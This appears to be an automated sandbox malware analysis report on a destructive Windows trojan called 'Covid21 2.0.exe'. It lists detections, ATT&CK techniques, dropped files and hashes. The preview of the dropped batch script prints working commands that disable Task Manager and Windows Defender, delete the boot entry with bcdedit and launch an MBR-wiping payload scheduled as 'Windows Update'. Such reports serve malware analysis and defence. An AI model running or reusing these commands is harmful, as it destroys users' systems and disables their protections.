Source: C:\covid21\Corona.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004050DC
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_0040A9FC
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_0040AA48
Source: C:\covid21\Corona.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004051E8
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_004059D2
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_004059D4
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,GetACP,12_2_0040BFE8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,13_2_00405070
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_0040A8B4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_0040A900
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,13_2_0040517C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_00405966
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_00405968
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,GetACP,13_2_0040BE14
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: GetLocaleInfoA,18_2_0043DE27
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,30_2_004043C8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: GetLocaleInfoA,30_2_004082D0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: GetLocaleInfoA,30_2_0040831C
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00409B44 GetLocalTime,6_2_00409B44
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00419AF0 GetComputerNameA,GetUserNameA,_strcat,_strlen,18_2_00419AF0
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00403CD7 GetVersionExA,GetVersionExA,GetVersionExA,0_2_00403CD7
Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Disables the Windows task manager (taskmgr)Show sources
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
Source: z.exe.0.drBinary or memory string: WIN_XP
Source: z.exe.0.drBinary or memory string: stoppedplay AHK_PlayMeopen "%s" alias AHK_PlayMe%s\All Files (*.*)*.*Text Documents (*.txt)*.txt%s%c%s%cAll Files (*.*)%c*.*%c Select File - %s::{The maximum number of File Dialogs has been reached. The current thread will exit.A Goto/Gosub must not jump into a block that doesn't enclose it.MMMMMMM%02d%03dMSec%dmsSlowSingleLogoff1.0.48.05\AutoHotkey.exeWIN32_WINDOWSWIN32_NTWIN_MEWIN_98WIN_95WIN_NT4WIN_2000WIN_2003WIN_VISTAWIN_XP.DEFAULT\Control Panel\Desktop\ResourceLocaleSYSTEM\CurrentControlSet\Control\Nls\LanguageInstallLanguageSOFTWARE\Microsoft\Windows\CurrentVersionProgramFilesDirAppDataCommon AppDataSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersDesktopCommon DesktopStart MenuCommon Start MenuProgramsCommon ProgramsStartupCommon StartupPersonalUpArrowSizeWESizeNWSESizeNSSizeNESWSizeAllSizeNoIBeamCrossArrowAppStartingUnknownGetCursorInfoColClickDoubleClickNormalGetLastInputInfo
Source: z.exe.0.drBinary or memory string: WIN_VISTA

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture31System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScripting112Scheduled Task/Job1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
Domain AccountsNative API1Registry Run Keys / Startup Folder1Access Token Manipulation1Scripting112Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture31Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsCommand and Scripting Interpreter1Bootkit1Process Injection12Obfuscated Files or Information21NTDSSystem Information Discovery37Distributed Component Object ModelClipboard Data2Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsScheduled Task/Job1Network Logon ScriptScheduled Task/Job1Software Packing21LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Masquerading1Cached Domain CredentialsSecurity Software Discovery351VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncVirtualization/Sandbox Evasion15Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion15Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowApplication Window Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronBootkit1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 377010 Sample: Covid21 2.0.exe Startdate: 28/03/2021 Architecture: WINDOWS Score: 84 75 Multi AV Scanner detection for submitted file 2->75 77 Machine Learning detection for sample 2->77 9 Covid21 2.0.exe 15 2->9         started        process3 file4 39 C:\Users\user\AppData\Local\Temp\...\z.exe, PE32 9->39 dropped 41 C:\Users\user\AppData\...\screenscrew.exe, PE32 9->41 dropped 43 C:\Users\user\AppData\Local\Temp\...\mlt.exe, PE32+ 9->43 dropped 45 5 other files (4 malicious) 9->45 dropped 12 cmd.exe 3 8 9->12         started        process5 file6 47 C:\covid21\Corona.exe, PE32 12->47 dropped 49 C:\Users\user\AppData\Local\Temp\...\y.vbs, ASCII 12->49 dropped 51 C:\Users\user\AppData\Local\Temp\...\x.vbs, ASCII 12->51 dropped 53 C:\Users\user\AppData\Local\Temp\...\t.vbs, ASCII 12->53 dropped 79 Command shell drops VBS files 12->79 81 Uses cmd line tools excessively to alter registry or file data 12->81 16 PayloadMBR.exe 12->16         started        20 icons.exe 12->20         started        22 inv.exe 12->22         started        24 25 other processes 12->24 signatures7 process8 file9 37 \Device\Harddisk0\DR0, DOS/MBR 16->37 dropped 55 Antivirus detection for dropped file 16->55 57 Multi AV Scanner detection for dropped file 16->57 59 Protects its processes via BreakOnTermination flag 16->59 73 2 other signatures 16->73 26 schtasks.exe 16->26         started        61 Machine Learning detection for dropped file 20->61 63 Found API chain indicative of debugger detection 20->63 28 conhost.exe 20->28         started        65 Contains functionality to detect sleep reduction / modifications 22->65 67 Contains functionalty to change the wallpaper 24->67 69 Sample or dropped binary is a compiled AutoHotkey binary 24->69 71 Disables the Windows task manager (taskmgr) 24->71 30 Corona.exe 24->30         started        33 conhost.exe 24->33         started        signatures10 process11 signatures12 35 conhost.exe 26->35         started        83 Contains functionality to detect sleep reduction / modifications 30->83 process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Covid21 2.0.exe70%VirustotalBrowse
Covid21 2.0.exe30%MetadefenderBrowse
Covid21 2.0.exe75%ReversingLabsWin32.Trojan.DiskWriter
Covid21 2.0.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe100%AviraHEUR/AGEN.1133501
C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe4%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exe8%ReversingLabs
C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe82%ReversingLabsWin32.Trojan.KillMbr
C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe13%ReversingLabs
C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe6%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe48%ReversingLabsWin32.Downloader.Convagent
C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe36%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe62%ReversingLabsWin32.PUA.BlurScrn
C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe7%ReversingLabs
C:\covid21\Corona.exe8%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.Covid21 2.0.exe.63145a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
36.2.PayloadMBR.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
0.0.Covid21 2.0.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
12.2.Corona.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
36.0.PayloadMBR.exe.400000.0.unpack100%AviraHEUR/AGEN.1133501Download File
13.2.inv.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
6.2.CLWCP.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
0.2.Covid21 2.0.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.autohotkey.comCould0%Avira URL Cloudsafe
http://www.rjlsoftware.com(0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.rjlsoftware.com/?screenscrewopenjscreenscrew.exe, 0000001E.00000003.729503063.00000000021D0000.00000004.00000001.sdmpfalse
    		high
    http://www.rjlsoftware.com/?screenscrewscreenscrew.exefalse
      		high
      http://www.autohotkey.comz.exe.0.drfalse
        		high
        http://www.autohotkey.comCouldCovid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.rjlsoftware.comscreenscrew.exe, 0000001E.00000002.792044732.000000000043B000.00000004.00020000.sdmpfalse
          		high
          http://www.rjlsoftware.com(screenscrew.exe, 0000001E.00000002.793881577.00000000022C0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		low

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:31.0.0 Emerald
          Analysis ID:377010
          Start date:28.03.2021
          Start time:15:52:23
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 15m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:Covid21 2.0.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:40
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Critical Process Termination
          Detection:MAL
          Classification:mal84.rans.evad.winEXE@73/19@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 90% (good quality ratio 87.5%)
          • Quality average: 84.6%
          • Quality standard deviation: 24.6%
          HCA Information:
          • Successful, ratio: 53%
          • Number of executed functions: 144
          • Number of non-executed functions: 346
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Sleeps bigger than 120000ms are automatically reduced to 1000ms
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          15:53:32API Interceptor1x Sleep call for process: z.exe modified
          15:54:02Task SchedulerRun new task: Windows Update path: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exeCovid21 2.0.exeGet hashmaliciousBrowse
            C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeCovid21 2.0.exeGet hashmaliciousBrowse
              C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.execovid21.exeGet hashmaliciousBrowse
                HorrorTrojan 2.exeGet hashmaliciousBrowse
                  HorrorTrojan.exeGet hashmaliciousBrowse
                    HorrorTrojan.exeGet hashmaliciousBrowse
                      Fall Guys Cheat.exeGet hashmaliciousBrowse
                        Fall Guys Cheat.exeGet hashmaliciousBrowse
                          freebobux.exeGet hashmaliciousBrowse
                            C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeCovid21 2.0.exeGet hashmaliciousBrowse
                              covid21.exeGet hashmaliciousBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):517120
                                Entropy (8bit):6.5991952372789155
                                Encrypted:false
                                SSDEEP:12288:kDupRTrjf1nJp2NLtVu4jPau4p+lE3dWq:SExrj1DAt84DaTU4dW
                                MD5:E62EE6F1EFC85CB36D62AB779DB6E4EC
                                SHA1:DA07EC94CF2CB2B430E15BD0C5084996A47EE649
                                SHA-256:13B4EC59785A1B367EFB691A3D5C86EB5AAF1CA0062521C4782E1BAAC6633F8A
                                SHA-512:8142086979EC1CA9675418E94326A40078400AFF8587FC613E17164E034BADD828E9615589E6CB8B9339DA7CDC9BCB8C48E0890C5F288068F4B86FF659670A69
                                Malicious:true
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 4%, Browse
                                • Antivirus: Metadefender, Detection: 8%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: covid21.exe, Detection: malicious, Browse
                                • Filename: HorrorTrojan 2.exe, Detection: malicious, Browse
                                • Filename: HorrorTrojan.exe, Detection: malicious, Browse
                                • Filename: HorrorTrojan.exe, Detection: malicious, Browse
                                • Filename: Fall Guys Cheat.exe, Detection: malicious, Browse
                                • Filename: Fall Guys Cheat.exe, Detection: malicious, Browse
                                • Filename: freebobux.exe, Detection: malicious, Browse
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..........................@...................@...............................!.......p...................`...f...........................P......................................................CODE................................ ..`DATA................................@...BSS......................................idata...!......."..................@....tls....4....@...........................rdata.......P......................@..P.reloc...f...`...h..................@..P.rsrc....p.......p...t..............@..P.............@......................@..P........................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):531456
                                Entropy (8bit):7.007155751747995
                                Encrypted:false
                                SSDEEP:12288:bt007p82D5NYQ1bjLXHfNOTliq6G8/Q3Uk+leP4RG3:2qpzvYQ1Tfoi8b3U1kaq
                                MD5:6374CA8AD59246DFED4794FD788D6560
                                SHA1:D54281430AD11272F657DE4E909B4BA7B8561821
                                SHA-256:25B6F4ABC0B8A7A3F3CAE54A2F75810B977C0F5ED20AF98E77BE9449E7135108
                                SHA-512:0434F5C6ECD1A036A59E2F5DE56F0905460D46C31FFF6A7F160F54CFBCB56EA2DA22647D564E53D66C47A789A67D165C59E64D924B0F2CF80FDCD865847A772F
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 8%
                                Joe Sandbox View:
                                • Filename: Covid21 2.0.exe, Detection: malicious, Browse
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................2......H.............@..............................................@...........................0..V ..............................LX...........................p......................................................CODE................................ ..`DATA....8...........................@...BSS.......... ...........................idata..V ...0..."..................@....tls.........`...........................rdata.......p......................@..P.reloc..LX.......Z... ..............@..P.rsrc................z..............@..P....................................@..P........................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1444
                                Entropy (8bit):5.183015206655524
                                Encrypted:false
                                SSDEEP:24:YfzzhPV10V1+Vb+OV3q1gvV1Y5U2VVjfA+ifuhwXVCRB3aoSOZcRWm:YRPq+8OZq1gvAU2fTAnfuhwFCRB3ayeP
                                MD5:6B89A7FD6E3D9BDC4658162AAF468558
                                SHA1:F8EF11B2420B95661565B799D86C188BF11BF4A7
                                SHA-256:76986CDDBFEB8FA8738C8CA2665A7F91D19D1E8C6851151FCBA5164E35618DFB
                                SHA-512:F9B3338B65D5CA6CC25B1C36B2C3299D758D5E7AC92E6FD8D0298F945E898C51E548323F86A12983BB375E49404CB6B401F5472BBB580A6675DF57277045EF12
                                Malicious:false
                                Preview: @echo off..echo deleting previous versions of covid21.....rd c:\covid21 /s /q..cscript prompt.vbs..if ERRORLEVEL==1 goto infect..if ERRORLEVEL==0 goto quit....:infect..REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f..Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f..md c:\covid21..copy covid.jpg c:\covid21..clwcp c:\covid21\covid.jpg..reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f..echo do > x.vbs..echo msgbox "Covid-21 is here! Your Windows will get destroyed soon!" >>x.vbs..echo loop >>x.vbs..start x.vbs..bcdedit /delete {current}..copy corona.exe c:\covid21..start /min coronaloop.bat..echo msgbox "corona virus" >y.vbs..timeout 5 /nobreak..start inv.exe..start y.vbs..timeout 5 /nobreak..start z.exe..start y.vbs..timeout 5 /nobreak..start mlt.exe..start y.vbs..timeout 5 /nobr
                                C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):103424
                                Entropy (8bit):6.182089878681113
                                Encrypted:false
                                SSDEEP:3072:wCGPVHzzgd2HPVVf9AebuLFfK9s7I+PnNgDd9:wrak9gor+Pn6
                                MD5:D917AF256A1D20B4EAC477CDB189367B
                                SHA1:6C2FA4648B16B89C4F5664F1C3490EC2022EB5DD
                                SHA-256:E40F57F6693F4B817BEB50DE68027AABBB0376CA94A774F86E3833BAF93DC4C0
                                SHA-512:FD2CB0FB398A5DDD0A52CF2EFC733C606884AA68EC406BDBDDB3A41B31D6F9C0F0C4837326A9D53B53202792867901899A8CF5024A5E542E8BDCEE615BE0B707
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 82%
                                Joe Sandbox View:
                                • Filename: Covid21 2.0.exe, Detection: malicious, Browse
                                • Filename: covid21.exe, Detection: malicious, Browse
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*................."...n.......-.......@....@..........................0...................@......................................h...........................................................................................................CODE.....!.......".................. ..`DATA.....5...@...6...&..............@...BSS......8...........\...................idata...............\..............@....tls.................h...................rdata...............h..............@..P.reloc...............j..............@..P.rsrc...h...........................@..P.............0......................@..P........................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\2526.tmp\coronaloop.bat
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):48
                                Entropy (8bit):4.292962241741917
                                Encrypted:false
                                SSDEEP:3:jTDVJWoHgKTHd6vJcn:/etmdEJcn
                                MD5:08437E731C7B135B3779B004C7863E5F
                                SHA1:24CE5D4075FDC5AFEC6CB87CACFC7B54DEADC3EC
                                SHA-256:043B49FBBE070997844A2C4467596553261BFB6EA79AC3C50FABD42146EEA924
                                SHA-512:6006014B10F400B6975B391BE64E07E78FE5A3818CD39A0A8F9349C4CFF595134FB5217BEB5205E04EAB86473C4FA0F6701B657D76C144540AA468D2D382C8A1
                                Malicious:false
                                Preview: echo off..cls..:0..c:\covid21\corona.exe..goto 0
                                C:\Users\user\AppData\Local\Temp\2526.tmp\covid.jpg
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1920x1080, frames 3
                                Category:dropped
                                Size (bytes):170445
                                Entropy (8bit):7.987389688426996
                                Encrypted:false
                                SSDEEP:3072:mTwQIE+8Tj6wFrxGxGtSdWyCmI5KkeD8vcWtTH3Mi/gc+P9IP7HwKFKBlrF:qOE+o6hgcYLmI5+8k+TH3Mi/J+Pi7Hwn
                                MD5:94AD752ABC09644D0B91A07022ECB000
                                SHA1:7EE97DC56E62E7B2D86EE892E7CF70673252242F
                                SHA-256:E3760C671CEC108580D47B0F8C11AE79E9DF9941D2E878032EEDA1B510F91231
                                SHA-512:9C0109A8E7DE5EA42B3CE8788A412F6ED1158AFD3DB87884034631DA15EC4C16275F0578C6AD438E91DC203C89AEF725D2642E06B751DF5CFF0D47B3D9A1AD1E
                                Malicious:false
                                Preview: ......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C..................................................#...#*%%*525EE\...C..................................................#...#*%%*525EE\......8....".....................................................................................DFD..)`.$bD...1"#"DIP..."$d..H.D..bI .(.F ......."I.F.0..b.A..I".B0...$.F.0#.$$`(H..$.J...W..~R....5...i.xlVc'..j.2b..U^}y..>d...)P$B F...P..1.T............T.PS*.aL@..B......$.0....0...$.. I.@."..$
                                C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):107828
                                Entropy (8bit):5.4025127824732335
                                Encrypted:false
                                SSDEEP:1536:eb4k5iT76crYyIyLIOwu3yUywCbsR+EKDyfq1aX:eb4N36cHIyLGMbzX
                                MD5:3CA1D5768C2944D4284B1541653823C7
                                SHA1:85CF021AC23CD1340C6D649E6A77A213C1F848B6
                                SHA-256:4172C6120F8F98685698365D6DD52C80EB2080203CDDE479009BF8F4FA770AF0
                                SHA-512:7972ADB329DBEBC347B8A68789BBAC4BA7C230CC980910D18A322D1A512015633D2A5801E76C0AAE2FCFE120790C69417864549787DFC37574FB0AA3BFC202F0
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 13%
                                Joe Sandbox View:
                                • Filename: Covid21 2.0.exe, Detection: malicious, Browse
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O6`.2..S................................0....@.................................!......... ..............................`..0...................................................................................0a...............................text............................... .P`.data...,....0......................@.0..rdata..p....@......................@.0@.bss....P....P........................p..idata..0....`.......$..............@.0..CRT....4....p.......,..............@.0..tls.... ...........................@.0./4...................0..............@.@B/19..................4..............@..B/31.....k....P......................@..B/45..........p......................@..B/57.................................@.0B/70.................................@..B/81.................. ..............@..B/92.....@...........................@..B........................
                                C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):367616
                                Entropy (8bit):6.563758955317025
                                Encrypted:false
                                SSDEEP:6144:qizJVFAO7rdGlh4sQstCPhiomhiGM80JCMlTe06z0aPawSoQBAlAq4SYwhl:RJ/AO7rAlys3tCj80x6zlawSo5Aq4Xwv
                                MD5:EBB811D0396C06A70FE74D9B23679446
                                SHA1:E375F124A8284479DD052161A07F57DE28397638
                                SHA-256:28E979002CB4DB546BF9D9D58F5A55FD8319BE638A0974C634CAE6E7E9DBCD89
                                SHA-512:1DE3DCD856F30004BECEE7C769D62530F3A5E9785C853537ADC0A387D461C97B305F75CBAF13F278DD72BA22D4650E92C48EDF3C3A74B13ED68FFC0D45E13774
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 6%, Browse
                                • Antivirus: ReversingLabs, Detection: 48%
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................*........T...................@...T...........................0......................................................CODE....L........................... ..`DATA.... ...........................@...BSS......................................idata..*........ ..................@....tls......... ...........................rdata.......0......................@..P.reloc...T...@...V..................@..P.rsrc....T.......T...H..............@..P....................................@..P........................................................................................................................................
